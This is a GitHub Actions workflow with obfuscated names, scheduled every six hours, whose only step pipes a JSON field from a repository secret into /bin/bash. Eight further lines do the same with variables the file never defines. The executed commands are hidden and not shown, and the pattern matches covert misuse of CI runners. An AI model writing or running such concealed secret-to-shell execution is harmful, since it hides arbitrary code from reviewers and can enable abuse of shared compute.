name: gonghanlu6721

on:
  workflow_dispatch:
  schedule:
    - cron: '25 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: gonghanlu6721
        env:
          cgffa395: ${{ secrets.cgffa395 }}
        run: |
          echo $cgffa395 | jq -r .mxws41 | /bin/bash
          echo $vseh00 | jq -r .f6 | /bin/bash
          echo $ju96874 | jq -r .zrwf3 | /bin/bash
          echo $qm14192 | jq -r .jdqp2970 | /bin/bash
          echo $xpaue931 | jq -r .dhtwu55 | /bin/bash
          echo $sqi2338 | jq -r .awkc891 | /bin/bash
          echo $oq58051 | jq -r .plqpq61 | /bin/bash
          echo $m399 | jq -r .n19637 | /bin/bash
          echo $zrh61608 | jq -r .hwr274 | /bin/bash

